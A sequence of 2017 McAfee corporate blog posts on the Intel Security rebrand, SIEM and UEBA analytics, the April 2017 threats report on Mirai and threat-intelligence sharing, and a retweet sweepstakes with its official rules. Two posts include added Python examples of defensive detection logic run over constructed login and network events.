He reminds us that a customer’s journey needs to be strategic, which means we also need to begin the customer journey with a strategy, as well. That’s where strong cybersecurity education comes into play.

Keeping Education Top of Mind

We are in an industry that is charged with securing the lives of people who are dealing with complex problems. And unfortunately, a lot of our customers want to fully understand the problems they’re facing, but can’t.

Therefore, these customers are relying on us to tell them what they don’t know, and more importantly, what they need to do to stay safe.

That’s why the new McAfee is focused on making things simple, smooth, and easy for customers to understand. We want to break cybersecurity down in a way our customers can easily grasp and translate to their own lives. That way, cybersecurity becomes less intimidating and just second nature to them. To accomplish that, we’re going to constantly stay one step ahead by knowing what threats and technologies are on the horizon.

Teamwork Like Never Before

As the new McAfee, we’re experiencing a culture shift that’s allowing us to streamline and optimize our efforts as a team. We’re now better supporting each other, using everyone to the best of their ability, and keeping everyone accountable for their actions. The result? Teamwork like we’ve never seen before.

That’s because we know this is all of our responsibility, and with that responsibility comes a sense of pride and ownership that is ingrained in the fabric of McAfee. We’re proud that we get to positively impact so many lives, and we’re proud we can do that as McAfee employees.

When you meet a McAfee employee, any employee, you see a blue-collar mentality that drives the way they work. Everyone is ready to get their hands dirty, do what they have to do to get it fixed, and get it right. We’re doers, and our customers know that. In fact, they’re counting on it.

Join the conversation about #newMcAfee! Tweet to us at @McAfee and @McAfee_Home

Leveraging SIEM and Security Analytics for Improved Monitoring of Advanced Threats
https://securingtomorrow.mcafee.com/business/security-operations/leveraging-siem-security-analytics-improved-monitoring-advanced-threats/
Fri, 07 Apr 2017 19:00:40 +0000

This blog post was written by Karl Klaessig.

For more than a decade, in response to higher volumes of alerts, security information and event management (SIEM) has been an integral component of enterprise security programs. However, the increasing sophistication and complexity of attacks are driving the need for advanced analytics—beyond the log aggregation of older SIEM solutions. Security analytics, which uses Big Data technologies, has emerged to fill in the gaps.

In its recent report, “Security Analytics Team of Rivals,” consulting firm Securosis contends that security analytics solutions provide maximum value when integrated with advanced SIEM solutions and vice versa. One is not a replacement for the other, nor should they be viewed as competing solutions.

Most enterprises have had a SIEM in place for a number of years. Its main strengths include: data aggregation, correlation, forensics and incident response, and reporting. The data sets that are generally handled best by a SIEM are network data, endpoint activity, server and data logs and change control activity, identity data, application logs, and threat intelligence feeds.

One thing that some SIEMs struggle with is finding patterns in large volumes of data. Security analytics solutions, on the other hand, are intentionally designed to crunch through SIEM’s huge data sets, looking for indicators of malicious activity, such as anomalous patterns of activity, misconfiguration, or privilege escalation. The integrated solutions are particularly good at advanced threat detection and tracing insider attacks.

How do you benefit from integrating analytics solutions with your SIEM? For one thing, today’s security analytics solutions don’t let you search for an alert and then set an incident response process in motion—SIEMs handle that job and lend themselves well to easy and comprehensive threat activity visualizations and reporting. There are two key integration points where you’ll find the combination invaluable:

  • Automated Data Analysis: SIEMs have been proficient at collecting and aggregating data for a long time. In order to extract this data for further analysis, ensure that your integration of SIEM and security analytics has sufficiently robust automated processes. This can save an enormous amount of time.
  • Alert Prioritization: Both your SIEM and your security analytics tools will create and send out alerts. Bi-directional information sharing between the SIEM and security analytics solutions is essential so that your team can prioritize investigative actions and maintain context.

Let’s look at a scenario where SIEM and security analytics can complement one another to detect what appears to be an advanced insider attack. In this use case, the security team of a fast-growing retail operation receives an alert from its SIEM solution. It appears that an insider is probing the internal network, which is highly unusual activity for an employee. For a more complete picture of the situation, the team accesses its integrated SIEM and security analytics solution for additional insights on what the adversary is up to. The integrated investigation reveals several types of unusual activity—like privilege escalations and configuration changes on multiple devices. The SIEM reports the trajectory of the attacker, which results in compromise of the device that triggered the alert in the first place, and this enables smarter and faster remediation.
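The insider scenario above as detection logic over constructed events. This is an added example, not code from the post or from any McAfee product: the usernames, hosts, addresses and event records are made up, `detect_internal_probe` plays the SIEM rule that raises the original alert, and `attacker_trajectory` plays the analytics enrichment that pulls the same account’s earlier privilege escalations and configuration changes into an ordered trajectory and prioritizes the case accordingly.

```python
"""Constructed illustration of a SIEM alert enriched by analytics over the same
event archive: an internal-probe alert on one account is placed in context with
that account's earlier privilege escalations and configuration changes."""
from collections import defaultdict
from datetime import datetime, timedelta


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


# Constructed normalised events: (time, user, host, type, detail)
EVENTS = [
    ("2017-04-03T08:12:00Z", "jdoe", "SRV-DB1", "priv_escalation", "added to local Administrators"),
    ("2017-04-03T08:40:30Z", "jdoe", "FW-EDGE1", "config_change", "rule added: 10.0.0.0/8 -> any:445"),
    ("2017-04-03T09:05:10Z", "asmith", "WS-09", "priv_escalation", "sudo package install"),
    ("2017-04-03T09:10:00Z", "jdoe", "SRV-FILE2", "config_change", "audit logging disabled"),
]
# jdoe's workstation touches 25 distinct internal hosts inside one minute...
EVENTS += [("2017-04-03T09:30:%02dZ" % (2 * i), "jdoe", "WS-41", "net_connect", "10.0.5.%d:445" % (10 + i))
           for i in range(25)]
# ...while asmith's repeatedly reaches one intranet server, which is normal
EVENTS += [("2017-04-03T09:31:%02dZ" % i, "asmith", "WS-09", "net_connect", "10.0.1.5:443") for i in range(5)]


def detect_internal_probe(events, min_targets=20, window=timedelta(seconds=60)):
    """SIEM-style rule: one user on one host reaching at least min_targets
    distinct internal endpoints within `window` is flagged as probing."""
    by_source = defaultdict(list)
    for t, user, host, etype, detail in events:
        if etype == "net_connect":
            by_source[(user, host)].append((parse_ts(t), detail.split(":")[0]))
    alerts = []
    for (user, host), conns in by_source.items():
        conns.sort()
        for i, (start, _) in enumerate(conns):
            targets = {dst for when, dst in conns[i:] if when - start <= window}
            if len(targets) >= min_targets:
                alerts.append({"user": user, "host": host, "time": start, "targets": len(targets)})
                break
    return alerts


def attacker_trajectory(events, alert, lookback=timedelta(hours=24)):
    """Analytics-style enrichment: gather the alerting account's earlier
    privilege escalations and configuration changes and order them in time."""
    steps = []
    for t, user, host, etype, detail in events:
        when = parse_ts(t)
        if user == alert["user"] and etype in ("priv_escalation", "config_change") \
                and alert["time"] - lookback <= when <= alert["time"]:
            steps.append((when, host, etype, detail))
    steps.sort()
    steps.append((alert["time"], alert["host"], "net_probe", "%d internal targets" % alert["targets"]))
    devices = []
    for _, host, _, _ in steps:
        if host not in devices:
            devices.append(host)
    # Escalation plus configuration changes spread over several devices outranks a lone probe
    kinds = {step[2] for step in steps}
    priority = "high" if {"priv_escalation", "config_change"} <= kinds and len(devices) >= 3 else "medium"
    return {"user": alert["user"], "priority": priority, "devices": devices, "steps": steps}


def investigate(events=EVENTS):
    """Run the SIEM rule, then enrich each alert; returns the enriched cases."""
    return [attacker_trajectory(events, alert) for alert in detect_internal_probe(events)]
```

`investigate()` returns one case: the probe from WS-41 is the trigger, but the ordered `steps` show the account first gaining local administrator rights on a database server, then opening a firewall rule and disabling audit logging on a file server, so the case is ranked high and the device list is ready for remediation rather than a single-host ticket.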

To learn more about how your SIEM and security analytics tool can coordinate and complement each other, read the Securosis report, “Security Analytics Team of Rivals.”

How Working Together Accelerates Our Evolution
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/working-together-accelerates-evolution/
Thu, 06 Apr 2017 15:00:47 +0000

This blog post was written by Vincent Weafer.

It is no secret that the end goal for cybersecurity companies is to battle cyber-threats and cyber-attackers in order to keep their customers’ assets and data safe. Easy, right? Well, the problem is that defenders must move faster than the attackers, faster than the underlying technologies change, and faster than the attackers’ tools grow in power. That is extremely difficult to achieve if you try to do it by yourself in isolation, no matter your size or skills. Today’s cybersecurity juggernauts have tried to go about this in silos, which slows innovation in an industry that needs to evolve faster than the cybercriminals.

We’ve innovated in silos too. But no longer. With the launch of the new McAfee, we believe that #TogetherIsPower and are focusing on better collaboration to more quickly unlock the potential in our company and in the industry.

This collaboration comes in two forms: uniting across the industry in the fight against cybercrime and working together with our customers to better understand how to protect them. Both result in stronger, more innovative ideas, and ultimately, in better solutions to tricky security challenges.

Uniting the White Hat Fight

Silos have left the cybersecurity industry out of breath as it chases after inventive cybercriminals, desperate to catch up to their newest malicious innovations. And though partnerships like the Cyber Threat Alliance and technologies like McAfee Open DXL are great first steps, they’re just the beginning of an important movement. That’s where the new McAfee comes in: our new company allows us the freedom and agility to share knowledge, utilize the entire cybersecurity ecosystem to our advantage, and expand on existing partnerships and programs. There’s a difference in execution speed as well, since the new McAfee can now forge new partnerships at a faster rate than ever before – giving us a better chance at quickly tackling the newest cyber threats. Through these partnerships, white hats will begin to catch up with black hats.

Finding Strength in an Open Dialogue

Collaboration will also be a cornerstone of our customer relationships.

Our customers are the driving force behind our innovation, so it is critical that we understand their security challenges and where they see cybersecurity risks. Deeper dialogs will help generate new ideas, build stronger solutions, and solve problems more effectively.

Driving Evolution Forward

It is this dedication to collaboration – within the industry and with our customers – that defines what the new McAfee stands for as a company. We are excited about the new McAfee: a company that continues to grow, change and adapt; one that works endlessly to create better ideas, better products and better security.

For more information, follow us at @McAfee_Labs and @McAfee, and join the conversation with #TogetherIsPower

McAfee Labs Threats Report Explores Threat Intelligence Sharing and Mirai, the IoT Botnet
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-threat-intelligence-sharing-mirai-iot-botnet/
Thu, 06 Apr 2017 04:01:46 +0000

This blog post was written by Vincent Weafer.

In the McAfee Labs Threats Report: April 2017, published today, we explore two key topics.

Following an announcement by the Cyber Threat Alliance of its formal incorporation and the release of a threat intelligence sharing platform, we provide some perspective about threat intelligence sharing. The story provides a detailed analysis of the background and drivers of threat intelligence sharing, the various components of threat intelligence and its sources, how mature security operations can use this information, five critical challenges that need to be overcome, and the evolving sharing models that have appeared in the market.

To move threat intelligence sharing to the next level of efficiency and effectiveness, the story explains why improvement is needed in three areas:

  • We need to simplify event triage and provide a better environment for security practitioners to investigate high-priority threats.
  • We need to do a better job establishing relationships between indicators of compromise so that we can understand their connections to attack campaigns.
  • We need a better way to share threat intelligence among our own products and with other vendors.

You can learn about integrating threat intelligence in McAfee environments by reading the Operationalizing Threat Intelligence solution brief.

***

On October 21, 2016, the DNS provider Dyn was hit with a massive and complex distributed denial-of-service attack. At its peak, Dyn was flooded by 1.2 Tbps of traffic, the highest volume of DDoS traffic ever recorded. The analysis of the attack confirmed that the DDoS traffic originated from Internet of Things devices infected by the Mirai botnet.

In our second story, we examine the Mirai botnet, including its architecture and inner workings; its attack process, including the many attack vectors it can use to flood targets; and its evolution.

During our analysis of Mirai, we set up a honeypot masquerading as an unprotected, publicly accessible IoT device to see if we could attract a Mirai incursion. In fewer than five minutes, we registered the first attempted attack. Watch the video of the honeypot console, showing how quickly the simulated IoT device was discovered and attacked.

You can learn how to secure IoT devices and how McAfee products can protect systems and networks from IoT device attacks by reading the Secure IoT Devices to Protect Against Attacks solution brief.

***

Finally, we provide rich statistical detail about Q4 threat activity. Here are some highlights:

  • Malware. The number of new malware samples in Q4—23 million—dropped 17% from Q3. However, the overall count grew 24% in 2016 to 638 million samples.
  • Ransomware. The number of new ransomware samples fell 71% in Q4, mostly due to a drop in generic ransomware detections, as well as a decrease in Locky and CryptoWall. The number of total ransomware samples grew 88% in 2016.
  • Mobile malware. The number of new mobile malware samples declined by 17% in Q4. But total mobile malware grew 99% in 2016.
  • Mac OS malware. Although still small compared with Windows threats, the number of new Mac OS malware samples grew 245% in Q4, due to adware bundling. Total Mac OS malware grew 744% in 2016.
  • Security incidents. We counted 197 publicly disclosed security incidents in Q4 and 974 publicly known security incidents in 2016.

The McAfee Labs Threats Report: April 2017 is available here.

Help Us Celebrate #newMcAfee Re-Tweet to Win!
https://securingtomorrow.mcafee.com/business/help-us-celebrate-newmcafee-re-tweet-win/
Wed, 05 Apr 2017 12:00:20 +0000

Today is a new day, and a new company: Intel Security has officially rebranded to McAfee, and because we’re so excited about this change, we’re using it as an excuse to give YOU the chance to win some prizes.

The Details:

With this new brand comes a new era of security, with the aim to protect people in our increasingly connected world. We’re spreading this message on social, on streamlined handles to account for the new brand.

So, as of today make sure you follow us on @McAfee to get all future updates.

How to Enter:

And to kick off this new era of McAfee, we are hosting a “retweet to win” social Sweepstakes throughout the month of April.

On @McAfee_Business, @McAfee_Home and @McAfee, re-tweet any tweets with this image (including #sweeps) and follow @McAfee for your chance to win. If you successfully complete each step, you’ll be entered for a chance to win a $50 Amazon Gift card. We’ll choose winners at random each Friday.

We’re giving away six $50 Gift Cards!

To Recap:

  • Starting April 4th, Intel Security will be rebranded to McAfee
  • On Twitter, whenever you see the above image, Re-tweet (include #sweeps) and follow @McAfee to be entered to win a $50 Amazon Gift Card
  • We’re giving away 6 Gift Cards, so that’s more chances to win if you enter every week
  • We’ll be announcing the winners via @McAfee and DM every Friday for the duration of the Sweepstakes, starting April 14th.
  • We will randomly select winners and will announce them on April 14th, 21st, and 28th.

Make sure to join the conversation on Twitter with #newMcAfee!

For full Sweepstakes details, please see the Official Rules below. By participating in this Sweepstakes you agree to be bound by the Official Rules and represent that you satisfy all of the eligibility requirements.

Intel Security Rebrand Social RT to Win Sweepstakes Official Rules

NO PURCHASE NECESSARY. VOID WHERE PROHIBITED BY LAW. SUBJECT TO APPLICABLE FEDERAL, STATE AND LOCAL LAWS.

  1. How to enter: Intel Security Rebrand Social RT to Win Sweepstakes will be conducted between April 4, 2017 and April 27, 2017. All entries for each period of the Rebrand Social RT to Win Sweepstakes must be received during the dates and times specified below to be entered into the corresponding drawing. Pacific Daylight Time shall control. One winner will be chosen at random for each of the first two sweepstakes entry periods and four winners will be chosen at random for the final entry period. The Rebrand Social RT to Win Sweepstakes entry periods are as follows:
  • Entry Periods and Winner Selection Dates:
  • Tuesday, April 4th 9:00am – Thursday, April 13th 6:00pm PT
    • One Winner announced: Friday, April 14th @10:00am PT
  • Friday, April 14th 11:00am – Thursday, April 20th 6:00pm PT
    • One Winner announced: Friday, April 21st @10:00am PT
  • Friday, April 21st 9:00am – Thursday, April 27th 6:00pm PT
    • Four Winners announced: Friday, April 28th @12:00pm PT

On each of the days listed above, there will be a tweet from @McAfee_Business, @McAfee_Home or @McAfee with a graphic and social copy instructing participants to enter the Sweepstakes.

For each tweet from McAfee, participants must complete the following steps during the entry periods specified above:

  1. Retweet a Sweepstakes tweet from any @McAfee affiliated Twitter account with the tag #sweepstakes in your entry
  2. Participant must also follow @McAfee to be considered

No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. Participants are only eligible to win once.

  2. Eligibility: The Sweepstakes is open only to all people who are 18 years of age or older on the date the Rebrand Social RT to Win Sweepstakes begins, who are legal residents of the 50 United States or District of Columbia. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

IF YOU DO NOT MEET ANY OF THESE REQUIREMENTS, OR ANY OTHER ELIGIBILITY REQUIREMENTS IN THESE OFFICIAL RULES, YOU ARE NOT ELIGIBLE TO WIN A PRIZE. To be eligible to win a prize, entries must be completed and received by Sponsor in the manner and format designated below. SWEEPSTAKES IS IN NO WAY SPONSORED, ENDORSED, ADMINISTERED BY, OR ASSOCIATED WITH TWITTER, INC.

  3. Winner Selection: Six (6) total winners, one (1) for each of the first two weeks of the Rebrand Social RT to Win Sweepstakes, and four (4) selected the third week, will be chosen from the eligible entries received during each of the Rebrand Social RT to Win Sweepstakes periods. Participants will only be eligible to win once. By participating, entrants agree to be bound by the Official Rebrand Social RT to Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: Each winner will be notified via direct message (“DM”) on Twitter.com by 12:00pm PDT on each of the days listed above. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

  4. Prizes: The prize for each Rebrand Social RT to Win Sweepstakes is a $50 Amazon e-gift card (approximate retail value “ARV” of the prize is $50 USD). Total ARV of all prizes is $300 (6 Amazon Gift Cards).

Entrants agree that Sponsor has the sole right to determine the winners of the Rebrand Social RT to Win Sweepstakes and all matters or disputes arising from the Rebrand Social RT to Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

  5. General conditions: Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner.

Sponsor, Twitter, and any of their respective parent companies are not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the Rebrand Social RT to Win Sweepstakes, or by any technical or human error which may occur in the processing of the Rebrand Social RT to Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the Rebrand Social RT to Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any Rebrand Social RT to Win Sweepstakes-related activity, or participation in the Rebrand Social RT to Win Sweepstakes.

Prize Forfeiture: If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize Rebrand Social RT to Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each Rebrand Social RT to Win Sweepstakes.

Dispute Resolution:  Entrants agree that Sponsor has the sole right to determine the winners of the Rebrand Social RT to Win Sweepstakes and all matters or disputes arising from the Rebrand Social RT to Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law: Each Prize Rebrand Social RT to Win Sweepstakes and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy: Personal information obtained in connection with this prize Rebrand Social RT to Win Sweepstakes will be handled in accordance with the policy set forth at http://www.mcafee.com/us/about/privacy.html

Limitations of Liability; Releases:  By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory. 

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING, NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE EXCEED $10.  THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.   

Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

License to Submission: By entering the Sweepstakes and providing your Submission in connection with the Sweepstakes, you hereby grant to Sponsor a perpetual, irrevocable, royalty-free, worldwide, nonexclusive license, (with the right to sublicense), to publish, reproduce, display, perform, distribute, adapt, edit, modify, translate, create derivative works based upon, and otherwise use and sublicense your Submission, or any portion thereof (including your name and likeness as shown and conveyed in the Submission), in connection with the Sweepstakes and for other advertising, marketing, and promotional purposes, and to incorporate Submissions, in whole or in part, into other works in any manner, form, media or technology now known or later developed.  Sponsor will have no obligation to publish or use or retain any Submission you submit or to return any such Submission to you.  You agree that it is your sole responsibility to obtain all permissions and releases necessary for the grant of the rights contained in this paragraph.  You agree to take, at Sponsor’s expense, any further action (including execution of affidavits, tax forms, and other documents) reasonably requested by Sponsor to effect, perfect or confirm Sponsor’s rights as set forth above in this paragraph.  You will not be entitled to compensation for any use by Sponsor, or its agents, licensees or assignees, of your Submission.

Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope to 2821 Mission College Blvd., Santa Clara, CA 95054, Attn: Rebrand Social RT to Win Sweepstakes, for arrival after April 28, 2017 and before April 28, 2018. To obtain a copy of these Official Rules, visit https://securingtomorrow.mcafee.com/business/help-us-celebrate-newmcafee-re-tweet-win/ or send a stamped, self-addressed business-size envelope to the address listed above, Attn: Rebrand Social RT to Win Sweepstakes. VT residents may omit return postage.

Intellectual Property Notice: McAfee is a registered trademark of McAfee, LLC.  The Sweepstakes and all accompanying materials are copyright © 2017 by McAfee, LLC.  All rights reserved.

Sponsor: McAfee, LLC 2821 Mission College Blvd., Santa Clara, CA 95054

Leveraging UEBA Capabilities in Your Existing SIEM https://securingtomorrow.mcafee.com/business/security-operations/leveraging-ueba-capabilities-existing-siem/ Fri, 31 Mar 2017 19:00:15 +0000

This blog post was written by Kristen Jacobsen.

User and entity behavior analytics (UEBA) uses advanced analytics to track and flag suspicious behaviors of both users and assets, such as networked assets, sensors, databases, devices, and hosts.
There are many reasons why UEBA is gaining traction, both as a tool integrated with SIEM and as a standalone solution. A few include:

  • Increasing concerns over insider threats, whether intentional or accidental.
  • The rise of credential theft.
  • The need to add additional context to SIEM and orchestration systems for more effective continuous monitoring, detection, and remediation.

Some SIEM vendors, like McAfee, not only deliver integrations with UEBA solutions, but also already include UEBA capabilities in their products. McAfee Enterprise Security Manager employs a combination of intelligent anomaly detection and user and entity specific rules, along with other correlation models, to perform many UEBA functions efficiently and effectively—right out of the box!

McAfee Enterprise Security Manager factors in anomalous behavior—including user activities—as part of its continuous monitoring and incident prioritization. User behaviors are incorporated into calculations of security and risk to help security teams identify and prioritize security events. Some of the user behaviors that McAfee Enterprise Security Manager detects as unusual activities include: creation of new accounts or account lockouts, possible data exfiltration behaviors (emailing sensitive data outside the network), an increase in traffic to business applications, and events like late-night logins from unexpected locations or simultaneous remote logins to multiple locations.

Security professionals agree that speed and accuracy are of the essence when it comes to detecting, analyzing, and triaging threats. McAfee Enterprise Security Manager addresses this requirement by using multiple types of correlation to gather, parse, and process the user behavior data it receives.

An additional component of the McAfee SIEM solution is the McAfee Advanced Correlation Engine, which is purpose-built to analyze huge volumes of data without impacting your SIEM’s performance. It performs four types of correlation—rule-based, risk-based, standard deviation, and historical—for a real-time look at threats initiated by users against high-value assets and sensitive data.
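As an added example (not McAfee code and not from the post), here is a small Python pass over constructed authentication events that implements two of the models the post lists: rule-based checks for late-night logins from unexpected locations, concurrent remote logins from different places and account lockouts, plus a standard-deviation baseline on daily login volume, rolled into a per-user risk score. The event fields, the baseline structure and the score weights are assumptions made for the example.

```python
"""Minimal UEBA-style scoring over constructed login events (added example)."""
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta
from statistics import mean, pstdev

Alert = namedtuple("Alert", "user rule detail score")

# Constructed sample events (not real logs): (timestamp, user, country, remote, outcome)
EVENTS = [
    ("2017-03-27T09:02:00", "alice", "US", False, "success"),
    ("2017-03-27T09:10:00", "bob", "US", True, "success"),
    ("2017-03-27T23:40:00", "alice", "RO", True, "success"),  # late night, never-seen country
    ("2017-03-27T23:50:00", "alice", "US", True, "success"),  # second remote login, other country
    ("2017-03-27T10:00:00", "carol", "US", False, "lockout"),
] + [(f"2017-03-27T{10 + i}:00:00", "dave", "US", True, "success") for i in range(6)]

# Constructed per-user baseline (assumed format): countries seen before, recent daily login counts.
BASELINE = {
    "alice": {"countries": {"US"}, "daily_logins": [3, 4, 3, 5, 4]},
    "bob": {"countries": {"US", "DE"}, "daily_logins": [2, 2, 3, 2, 2]},
    "carol": {"countries": {"US"}, "daily_logins": [4, 4, 5, 4, 4]},
    "dave": {"countries": {"US"}, "daily_logins": [1, 1, 2, 1, 1]},
}


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def late_night_unexpected_location(events, baseline):
    """Rule-based: successful login between 22:00 and 06:00 from a country not in the user's baseline."""
    alerts = []
    for ts, user, country, _remote, outcome in events:
        hour = _ts(ts).hour
        known = baseline.get(user, {}).get("countries", set())
        if outcome == "success" and (hour >= 22 or hour < 6) and country not in known:
            alerts.append(Alert(user, "late_night_unexpected_location", f"{ts} from {country}", 40))
    return alerts


def concurrent_remote_logins(events, window=timedelta(minutes=30)):
    """Rule-based: two successful remote logins by one user from different countries within `window`."""
    alerts = []
    by_user = defaultdict(list)
    for ts, user, country, remote, outcome in events:
        if remote and outcome == "success":
            by_user[user].append((_ts(ts), country))
    for user, logins in by_user.items():
        logins.sort()
        for i, (t_cur, c_cur) in enumerate(logins):
            for t_prev, c_prev in logins[:i]:
                if c_cur != c_prev and t_cur - t_prev <= window:
                    alerts.append(Alert(user, "concurrent_remote_logins",
                                        f"{c_prev} then {c_cur} within {window}", 30))
                    break
    return alerts


def account_lockouts(events):
    """Rule-based: every lockout is worth a look on its own."""
    return [Alert(user, "account_lockout", ts, 10)
            for ts, user, _c, _r, outcome in events if outcome == "lockout"]


def volume_above_baseline(events, baseline, k=2.0):
    """Standard-deviation model: today's login count exceeds the user's mean by more than k sigma."""
    counts = defaultdict(int)
    for _t, user, _c, _r, outcome in events:
        if outcome == "success":
            counts[user] += 1
    alerts = []
    for user, n in counts.items():
        history = baseline.get(user, {}).get("daily_logins")
        if not history:
            continue  # no baseline yet: a UEBA product would keep learning, we just skip
        mu, sigma = mean(history), pstdev(history)
        threshold = mu + k * max(sigma, 0.5)  # floor sigma so a flat history still has slack
        if n > threshold:
            alerts.append(Alert(user, "volume_above_baseline",
                                f"{n} logins vs mean {mu:.1f}, sd {sigma:.2f}", 20))
    return alerts


def score_users(events, baseline):
    """Run every model, sum each user's scores and return (user, score, rules) highest risk first."""
    alerts = (late_night_unexpected_location(events, baseline)
              + concurrent_remote_logins(events)
              + account_lockouts(events)
              + volume_above_baseline(events, baseline))
    totals, rules = defaultdict(int), defaultdict(list)
    for a in alerts:
        totals[a.user] += a.score
        rules[a.user].append(a.rule)
    return sorted(((u, totals[u], sorted(rules[u])) for u in totals),
                  key=lambda row: (-row[1], row[0]))


if __name__ == "__main__":
    for user, score, triggered in score_users(EVENTS, BASELINE):
        print(f"{user:<6} risk={score:<3} {', '.join(triggered)}")
```

On the constructed data, alice tops the list because two independent models agree on her, which is the prioritization effect the post describes; a single lockout or volume spike ranks lower.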

Currency and Performance Drive Multinational Conglomerate’s Migration to McAfee ENS https://securingtomorrow.mcafee.com/business/currency-performance-drive-multinational-conglomerates-migration-mcafee-ens/ Thu, 30 Mar 2017 14:00:11 +0000

“Maintaining currency is one of our new driving forces,” says Dwayne Cyr, senior cyber security manager at Textron, a $13.4 billion aerospace, defense, and advanced technologies conglomerate that employs over 35,000 people worldwide.

Textron is working diligently to stay ahead of cyber threats as well as provide a more leading-edge experience for its end users. For instance, with software releases occurring more frequently than in the past, the company has created a mechanism to simplify testing so that it can incorporate new releases more quickly.

The motivation to stay up to date with the latest improvements in technology, along with a desire for better scanning performance, led Textron to migrate as soon as it could to the new, more collaborative, more intelligent McAfee endpoint protection framework, McAfee Endpoint Security (ENS). “McAfee ENS has been heavily marketed as being a lot faster,” notes Cyr. “Our testing and some of our engineering communities definitely validated that.”

Textron first deployed McAfee ENS version 10.1, including migrating some Host Intrusion Prevention (HIPS) rules to the new ENS firewall. According to Cyr, the company is gearing up to deploy 10.2 across the extended enterprise in the near future.

Cyr describes his team’s experience with ENS thus far as “resoundingly positive.” He recalls only one issue after the migration to ENS—one of Textron’s applications looks an awful lot like a threat—but it was resolved quickly.

“The thing we’ve been really successful at is combing back our exclusions,” claims Cyr. “[With] the old anti-virus product you would have to exclude an entire directory [from virus scans]. [McAfee Endpoint Security] doesn’t have the same performance issues so you don’t need to exclude as much.”

Fewer exclusions mean more complete coverage, which translates to a stronger security posture. Not having to manually set exclusions for scans also reduces the time that engineers on Cyr’s team have to spend tweaking endpoint protection.

Cyr’s advice for others migrating to McAfee ENS: “Take a good hard look at the way you deploy [McAfee VirusScan Enterprise] because there are a lot of behaviors that you’ve learned that no longer apply to [ENS].”

